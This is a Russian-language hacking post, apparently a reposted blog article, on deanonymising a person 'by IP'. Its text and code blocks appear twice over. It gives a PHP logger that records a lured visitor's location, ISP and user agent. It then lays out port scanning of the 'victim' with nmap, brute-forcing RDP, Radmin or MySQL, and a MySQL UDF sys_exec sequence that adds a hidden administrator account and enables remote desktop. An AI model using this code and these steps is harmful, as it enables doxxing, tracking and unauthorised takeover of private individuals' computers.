Оригинал статьи: --Ссылка удалена--
Как часто в сети вы натыкались на угрозы в стиле «по IP вычислю»? Хотя бы пару раз точно.
Сегодня я покажу один из способов узнать хоть какую-нибудь информацию о каком-либо пользователе.
Теория
IP-адрес действительно может предоставить достаточно данных для того, чтобы задеанонить какого-либо человека.
Благодаря открытым базам ip-адресов возможно узнать страну, округ, город, провайдера.
Но, зачем ограничиваться данными об ip-адресе?
Переходим к практике
Акт первый — получение IP-адреса и детальной информации по оному
На коленке сварганил скрипт, собирающий основные данные о пользователе, зашедшем на сайт:
Используем уже известный из --Ссылка удалена-- сервис ip.api.com, который предоставляет развернутую информацию об IP-адресе.
Что делает скрипт?
Отправляет запрос к API с IP-адресом посетителя, разбирает ответ и записывает все необходимые данные (а так-же юзер-агент браузера) в .txt файл.
Отправляем юзеру ссылку на наш скрипт (у меня ссылка выглядит вот так — --Ссылка удалена-- ) и ждем, покуда он зайдет.
Сразу после входа на страницу скрипт запишет данные и сохранит в текстовик.
Профит — мы узнали страну, город и провайдера жертвы. Идем дальше.
Акт второй — пингуем порты
До этого большинство угрожающих деаноном хацкеров не доходит.
Заходим на замечательный ресурс mxtoolbox.com и пишем в форму scan:*тут ip-адрес*
--Ссылка удалена--
Нам очень повезло — у жертвы открыт 80 порт (веб-сервер) и 3389 порт (RDP — протокол удаленного доступа).
Стучимся сначала на веб-сервер с помощью браузера — прописываем в адресную строку http://ip-адрес, затем в RDP — с помощью стандартной утилиты Windows (Подключение к удаленному рабочему столу)
Дабы не попасться на уловку очень и очень советую стучаться с виртуальной машины под впном (а вдруг, вас тоже ждут?)
Если же сканирование завершилось неудачей, то пробуйте стучаться в другие порты — скачайте nmapи просканируйте все tcp/udp порты.
Кстати говоря, nmap выдаст вам еще и имя машины.
Акт третий — полный деанон
Если вы нашли уязвимые порты — RDP, Radmin, MySQL — начинаете брутить. Иначе, к сожалению, никак.
В случае RDP или Radmin'а все просто, а вот в случае с MySQL малость сложнее — потребуется заюзать UDF
Пример использования:
Так мы добавили админа и открыли RDP
Вместо заключения
Я малость отошел от основной темы, но всё же
В случае успеха брута и получения доступа к машине, вы получите и необходимые данные о жертве
К сожалению, сценарий, начинающийся со второго пункта, далеко не всегда имеет место быть.
Но попробовать всегда стоит.
Всех, кому интересны такие темы, как информационная безопасность, атаки на ресурсы, обратная разработка и просто программирование и дизайн, буду рад видеть в своем бложике - --Ссылка удалена--
Пока-что статей мало, но думаю что постить буду туда что-либо на постоянной основе
Как часто в сети вы натыкались на угрозы в стиле «по IP вычислю»? Хотя бы пару раз точно.
Сегодня я покажу один из способов узнать хоть какую-нибудь информацию о каком-либо пользователе.
Теория
IP-адрес действительно может предоставить достаточно данных для того, чтобы задеанонить какого-либо человека.
Благодаря открытым базам ip-адресов возможно узнать страну, округ, город, провайдера.
Но, зачем ограничиваться данными об ip-адресе?
Переходим к практике
Акт первый — получение IP-адреса и детальной информации по оному
На коленке сварганил скрипт, собирающий основные данные о пользователе, зашедшем на сайт:
<?php
$url = 'http://ip-api.com/json/'. $_SERVER['REMOTE_ADDR'];
$query = curl_init();
curl_setopt($query, CURLOPT_URL, $url);
curl_setopt($query, CURLOPT_RETURNTRANSFER, true);
curl_setopt($query, CURLOPT_SSL_VERIFYPEER, false);
$response = json_decode(curl_exec($query), true);
curl_close($query);
$paramSet = "[AS] ".
$response['as'] ."\n[City] ".
$response['city'] ."\n[Country] ".
$response['country'] ."\n[ISP] ".
$response['isp']. "\n[LAT] ".
$response['lat'] ."\n[LON] ".
$response['lon'] ."\n[ORG] ".
$response['org'] ."\n[Region] ".
$response['regionName'] ."\n[Timezone] ".
$response['timezone'] ."\n[ZIP] ".
$response['zip'] ."\n[UserAgent] ".
$_SERVER['HTTP_USER_AGENT'] ."\n[REMOTE_PORT]" .
$_SERVER['REMOTE_PORT'] ."\n";
$file = fopen($_SERVER['REMOTE_ADDR'] .".txt", "w");
fwrite($file, $paramSet);
fclose($file);
?>
$url = 'http://ip-api.com/json/'. $_SERVER['REMOTE_ADDR'];
$query = curl_init();
curl_setopt($query, CURLOPT_URL, $url);
curl_setopt($query, CURLOPT_RETURNTRANSFER, true);
curl_setopt($query, CURLOPT_SSL_VERIFYPEER, false);
$response = json_decode(curl_exec($query), true);
curl_close($query);
$paramSet = "[AS] ".
$response['as'] ."\n[City] ".
$response['city'] ."\n[Country] ".
$response['country'] ."\n[ISP] ".
$response['isp']. "\n[LAT] ".
$response['lat'] ."\n[LON] ".
$response['lon'] ."\n[ORG] ".
$response['org'] ."\n[Region] ".
$response['regionName'] ."\n[Timezone] ".
$response['timezone'] ."\n[ZIP] ".
$response['zip'] ."\n[UserAgent] ".
$_SERVER['HTTP_USER_AGENT'] ."\n[REMOTE_PORT]" .
$_SERVER['REMOTE_PORT'] ."\n";
$file = fopen($_SERVER['REMOTE_ADDR'] .".txt", "w");
fwrite($file, $paramSet);
fclose($file);
?>
Что делает скрипт?
Отправляет запрос к API с IP-адресом посетителя, разбирает ответ и записывает все необходимые данные (а так-же юзер-агент браузера) в .txt файл.
Отправляем юзеру ссылку на наш скрипт (у меня ссылка выглядит вот так — --Ссылка удалена-- ) и ждем, покуда он зайдет.
Сразу после входа на страницу скрипт запишет данные и сохранит в текстовик.
Профит — мы узнали страну, город и провайдера жертвы. Идем дальше.
Акт второй — пингуем порты
До этого большинство угрожающих деаноном хацкеров не доходит.
Заходим на замечательный ресурс mxtoolbox.com и пишем в форму scan:*тут ip-адрес*
--Ссылка удалена--
Нам очень повезло — у жертвы открыт 80 порт (веб-сервер) и 3389 порт (RDP — протокол удаленного доступа).
Стучимся сначала на веб-сервер с помощью браузера — прописываем в адресную строку http://ip-адрес, затем в RDP — с помощью стандартной утилиты Windows (Подключение к удаленному рабочему столу)
Дабы не попасться на уловку очень и очень советую стучаться с виртуальной машины под впном (а вдруг, вас тоже ждут?)
Если же сканирование завершилось неудачей, то пробуйте стучаться в другие порты — скачайте nmapи просканируйте все tcp/udp порты.
Кстати говоря, nmap выдаст вам еще и имя машины.
Акт третий — полный деанон
Если вы нашли уязвимые порты — RDP, Radmin, MySQL — начинаете брутить. Иначе, к сожалению, никак.
В случае RDP или Radmin'а все просто, а вот в случае с MySQL малость сложнее — потребуется заюзать UDF
Пример использования:
mysql> USE mysql;
mysql> CREATE TABLE bob(line blob);
mysql> INSERT INTO bob values(load_file('C:/xampplite/htdocs/mail/lib_mysqludf_sys.dll'));
mysql> SELECT * FROM mysql.bob INTO DUMPFILE 'c:/windows/system32/lib_mysqludf_sys.dll';
mysql> CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys.dll';
mysql> SELECT sys_exec("net user bob password /add");
mysql> SELECT sys_exec("net localgroup Administrators bob /add");
mysql> SELECT sys_exec("reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f");
mysql> CREATE TABLE bob(line blob);
mysql> INSERT INTO bob values(load_file('C:/xampplite/htdocs/mail/lib_mysqludf_sys.dll'));
mysql> SELECT * FROM mysql.bob INTO DUMPFILE 'c:/windows/system32/lib_mysqludf_sys.dll';
mysql> CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys.dll';
mysql> SELECT sys_exec("net user bob password /add");
mysql> SELECT sys_exec("net localgroup Administrators bob /add");
mysql> SELECT sys_exec("reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f");
Вместо заключения
Я малость отошел от основной темы, но всё же
В случае успеха брута и получения доступа к машине, вы получите и необходимые данные о жертве
К сожалению, сценарий, начинающийся со второго пункта, далеко не всегда имеет место быть.
Но попробовать всегда стоит.
Всех, кому интересны такие темы, как информационная безопасность, атаки на ресурсы, обратная разработка и просто программирование и дизайн, буду рад видеть в своем бложике - --Ссылка удалена--
Пока-что статей мало, но думаю что постить буду туда что-либо на постоянной основе
Последнее редактирование: